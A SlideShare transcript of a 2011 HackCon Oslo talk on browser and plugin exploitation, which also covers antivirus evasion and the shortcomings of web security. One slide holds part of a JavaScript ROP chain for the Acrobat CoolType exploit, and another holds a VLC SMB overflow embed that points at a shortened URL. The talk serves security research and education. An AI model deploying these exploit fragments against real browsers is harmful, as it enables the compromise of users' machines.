W.E.B. 2011The good, the bad, the ugly<br />Saumil Shah<br />HackCon Oslo, 2011<br />
# who am i<br />Saumil Shah, CEO Net-square<br />LinkedIn: saumilshah<br />
"The amount of intelligence in the world is constant.<br />And the population is increasing."<br />
LOOK AT ALL THE COOL STUFF!!<br />5<br />
5<br />33%<br />MORE!<br />
5<br />With JIT!Fights DEP, ASLR!<br />
5<br />Worldwide coverage,<br />Hides your tracks.<br />
5<br />...as never seen before!<br />
5<br />GUARANTEED!!<br />Fresh new bugs,<br />Present on most computers<br />
It's time for some sploitz!<br />
Obfuscated Javascript decoded without using eval, document.write, etc.<br />See no eval!<br />Acrobat CoolType<br />exploi...
High Tech vs. Low Tech<br />Acrobat CoolType exploit<br />Return Oriented Programming code<br />Escape-From-PDF<br />No fa...
This iz what ?<br />
I'm an evil Javascript<br />I'm an innocent image<br />
function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.s...
100% Pure Alphanum!<br />
VLC smb overflow - HTMLized!!<br /><embed type="application/x-vlc-plugin"<br />		width="320" height="200"<br />		target="h...
OMG!<br />Teh Intarwebz<br />are broken!<br />
W3C<br />"I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le...
Application Delivery<br />The Web<br />at present<br />Authentication<br />Statefulness<br />Data Typing<br />Non-mutable<...
Who you gonna call?<br />
howstuffworks - Anti Virus<br />YER NOT ON THE LIST! COME ON IN.<br />
AV Jedi Mind Trick<br />These are not the sploitz you're looking for.<br />
0-day to the Face!<br />"To get our new signature files you need a valid support plan."<br />
...and keep on patching<br />
The Solution?<br />HTML 8.0<br />HTTP 2.0<br />Browser Security Model<br />Self Contained Apps<br />
kthxbai<br />saumil@net-square.com<br />www.net-square.com<br />
Upcoming SlideShare
Loading in...5
×

W.E.B 2011 - The good, the bad, the ugly

1,209

Published on

My presentation at HackCon #6, Oslo.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,209
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Slew of recent Java vulnerabilities. Latest one being the command exec vuln with JavaWebStart. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  • Flash Sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • JNLP IE8 exploit on Win7Adobe Cooltype exploit on Win7IE8CSS exploit on Win7
  • W.E.B 2011 - The good, the bad, the ugly

    1. 1. W.E.B. 2011The good, the bad, the ugly<br />Saumil Shah<br />HackCon Oslo, 2011<br />
    2. 2. # who am i<br />Saumil Shah, CEO Net-square<br />LinkedIn: saumilshah<br />
    3. 3. "The amount of intelligence in the world is constant.<br />And the population is increasing."<br />
    4. 4. LOOK AT ALL THE COOL STUFF!!<br />5<br />
    5. 5. 5<br />33%<br />MORE!<br />
    6. 6. 5<br />With JIT!Fights DEP, ASLR!<br />
    7. 7. 5<br />Worldwide coverage,<br />Hides your tracks.<br />
    8. 8. 5<br />...as never seen before!<br />
    9. 9. 5<br />GUARANTEED!!<br />Fresh new bugs,<br />Present on most computers<br />
    10. 10.
    11. 11.
    12. 12.
    13. 13. It's time for some sploitz!<br />
    14. 14. Obfuscated Javascript decoded without using eval, document.write, etc.<br />See no eval!<br />Acrobat CoolType<br />exploit<br />IE+JNLP exploit<br />
    15. 15. High Tech vs. Low Tech<br />Acrobat CoolType exploit<br />Return Oriented Programming code<br />Escape-From-PDF<br />No fancy tricks<br />
    16. 16. This iz what ?<br />
    17. 17. I'm an evil Javascript<br />I'm an innocent image<br />
    18. 18. function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""<br /><CANVAS><br />
    19. 19.
    20. 20. 100% Pure Alphanum!<br />
    21. 21. VLC smb overflow - HTMLized!!<br /><embed type="application/x-vlc-plugin"<br /> width="320" height="200"<br /> target="http://tinyurl.com/ycctrzf"<br /> id="vlc" /><br />I'm in ur browser....<br />...blowin up ur g00dz<br />pwn<br />
    22. 22. OMG!<br />Teh Intarwebz<br />are broken!<br />
    23. 23.
    24. 24. W3C<br />"I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]<br />
    25. 25. Application Delivery<br />The Web<br />at present<br />Authentication<br />Statefulness<br />Data Typing<br />Non-mutable<br />HTTP<br />HTML<br />AJAX<br />Flash<br />Sandbox<br />HTML5<br />Anti-XSS<br />WAF<br />Silverlight<br />Web sockets<br />MIND THE GAP<br />
    26. 26. Who you gonna call?<br />
    27. 27. howstuffworks - Anti Virus<br />YER NOT ON THE LIST! COME ON IN.<br />
    28. 28. AV Jedi Mind Trick<br />These are not the sploitz you're looking for.<br />
    29. 29. 0-day to the Face!<br />"To get our new signature files you need a valid support plan."<br />
    30. 30. ...and keep on patching<br />
    31. 31. The Solution?<br />HTML 8.0<br />HTTP 2.0<br />Browser Security Model<br />Self Contained Apps<br />
    32. 32. kthxbai<br />saumil@net-square.com<br />www.net-square.com<br />

    ×